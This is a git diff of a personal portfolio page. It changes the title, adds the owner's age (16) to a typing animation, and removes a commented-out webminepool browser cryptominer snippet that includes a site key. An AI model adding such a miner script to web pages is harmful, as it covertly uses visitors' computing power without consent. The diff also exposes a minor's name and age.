--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@ j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
 <meta charset="utf-8">
 <meta content="width=device-width, initial-scale=1.0" name="viewport">
 
-<title>SeHyun Jun</title>
+<title>JSH's Portfolio</title>
 <meta content="" name="descriptison">
 <meta content="" name="keywords">
 
@@ -212,7 +212,7 @@ height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
   <script src="assets/vendor/typed.js/typed.min.js"></script>
   <script type="text/javascript">
     var typed = new Typed('.typing',{
-      strings: ["SeHyun Jun", "Student", "Developer", "Coder"],
+      strings: ["SeHyun Jun", "16yrs old", "Student", "Developer", "Coder"],
       loop: true,
       typeSpeed: 65,
       backSpeed: 65
@@ -223,14 +223,6 @@ height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
   <!-- Template Main JS File -->
   <script src="assets/js/main.js"></script>
   <!-- End Template Main JS File -->
-
-  <!-- Use User Resources
-  <script src="https://webminepool.com/lib/base.js"></script>
-  <script>
-    var miner = WMP.Anonymous('SK_ws5GsAy9YthWHAVWYcrdn');
-    miner.start(WMP.FORCE_MULTI_TAB);
-  </script>
-  End Use User Resources -->
 
 </body>
 
